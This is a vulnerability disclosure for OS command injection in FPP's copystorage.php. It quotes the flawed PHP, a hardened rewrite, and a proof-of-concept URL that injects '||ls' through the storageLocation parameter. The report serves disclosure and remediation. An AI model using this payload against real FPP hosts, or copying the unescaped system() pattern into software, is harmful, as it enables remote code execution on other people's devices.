OS Command Injection in FalconChristmas/fpp

Valid
Reported on May 12th 2021

✍️ Description

In https://github.com/FalconChristmas/fpp/blob/123cdf2eb11062766da333a7a4d85bc0bf620e47/www/copystorage.php#L27 (www/copystorage.php, line 27) a shell command line is built by concatenating raw GET parameters and handed to system() without any validation or escaping:

<?php
    // Build the target directory name; only the {DATE} placeholder is replaced,
    // the rest of $_GET['path'] is passed through untouched.
    $date = date("Ymd-Hi");
    $path = preg_replace('/{DATE}/', $date, $_GET['path']);

    echo "==================================================================================\n";

    // Every GET parameter is concatenated straight into the command string.
    $command = "sudo /opt/fpp/scripts/copy_settings_to_storage.sh " . $_GET['storageLocation'] . " " . $path . " " . $_GET['direction']  . " " . $_GET['delete'] . " " . $_GET['flags'] . " 2>&1"; // no sanitization :(

    // The command line and the output of system() are both echoed back, so an
    // injected command and its result are reflected in the HTTP response.
    echo "Command: $command\n";
    echo "----------------------------------------------------------------------------------\n";
    system($command);
    echo "\n";
?>

All five GET parameters (storageLocation, path, direction, delete and flags) are under the attacker's control and reach the shell unquoted; the preg_replace() on path only substitutes {DATE} and does nothing to stop shell metacharacters.
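As an added example (not code from the FPP project), the following is a hardened rewrite of the command construction above. Each parameter is first checked against an allowlist of the shape it is expected to have, then passed through escapeshellarg() so that it reaches the script as exactly one argument with no shell interpretation. The accepted values for direction and delete are assumptions for illustration, since the page does not show what copy_settings_to_storage.sh expects.

```php
<?php
// Added example, not code from the FPP project: a hardened version of the
// command construction quoted above. Two layers are applied to every
// parameter: an allowlist check that rejects anything outside the expected
// shape, then escapeshellarg() so each value reaches the script as exactly
// one argument with no shell interpretation.

// ASSUMPTION: the sets of values copy_settings_to_storage.sh accepts for
// direction and delete are not shown on this page; these are placeholders
// and must be taken from the script itself.
const ALLOWED_DIRECTIONS = ['TOSTORAGE', 'FROMSTORAGE'];
const ALLOWED_BOOLEANS   = ['true', 'false'];

function reject(string $name): void
{
    http_response_code(400);
    exit("Invalid value for parameter '$name'\n");
}

// Return the parameter only if it is a string matching $pattern. The D
// modifier makes $ match at the very end of the string, so a trailing
// newline cannot sneak past the check.
function requireMatch(string $name, string $pattern): string
{
    $value = $_GET[$name] ?? '';
    if (!is_string($value) || !preg_match($pattern, $value)) {
        reject($name);
    }
    return $value;
}

// Return the parameter only if it is one of the allowed literal values.
function requireEnum(string $name, array $allowed): string
{
    $value = $_GET[$name] ?? '';
    if (!in_array($value, $allowed, true)) {
        reject($name);
    }
    return $value;
}

// storageLocation: a device or mount name such as sda1 (no separators, no
// shell metacharacters). The PoC value "||ls" is rejected here.
$storage = requireMatch('storageLocation', '/^[A-Za-z0-9_-]{1,32}$/D');

// path: a single directory name; {DATE} is the only placeholder allowed and
// is expanded only after validation (date('Ymd-Hi') yields digits and '-').
$path = requireMatch('path', '/^(?:[A-Za-z0-9_.-]|\{DATE\})+$/D');
if (strpos($path, '..') !== false) {
    reject('path');
}
$path = str_replace('{DATE}', date('Ymd-Hi'), $path);

$direction = requireEnum('direction', ALLOWED_DIRECTIONS);
$delete    = requireEnum('delete', ALLOWED_BOOLEANS);

// flags: comma-separated plain words, may be empty.
$flags = requireMatch('flags', '/^[A-Za-z0-9_,]{0,64}$/D');

// Quote every argument individually; only the fixed script path and the
// redirection are left unquoted.
$args    = array_map('escapeshellarg', [$storage, $path, $direction, $delete, $flags]);
$command = 'sudo /opt/fpp/scripts/copy_settings_to_storage.sh '
         . implode(' ', $args) . ' 2>&1';

echo "Command: $command\n";
system($command, $status);
exit($status);
```

escapeshellarg() on its own would already stop the shell injection, but the allowlist is what keeps values such as a path containing ".." or an unexpected direction from being passed to the script as legitimate arguments. Since the script is invoked through sudo, the matching sudoers entry should also name the exact script path with no wildcards, so that the web user cannot reach anything beyond it.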

🕵️‍♂️ Proof of Concept

Visit http://127.0.0.1/copystorage.php?storageLocation=||ls

With only storageLocation set, the string handed to system() becomes

    sudo /opt/fpp/scripts/copy_settings_to_storage.sh ||ls     2>&1

so when the sudo invocation fails the shell runs ls, and because the page echoes both the command line and the output of system(), the directory listing comes back in the HTTP response. Any other shell separator works as well (; runs the injected command unconditionally), and ls can be replaced by any command. Depending on the client, the pipe characters may need to be sent URL-encoded as %7C%7C.

💥 Impact

Remote Code Execution: anyone who can reach copystorage.php can run arbitrary OS commands on the FPP host with the privileges of the web server process. The injected command runs outside the sudo invocation, so whether it can also be escalated depends on the sudoers policy granted to the web user.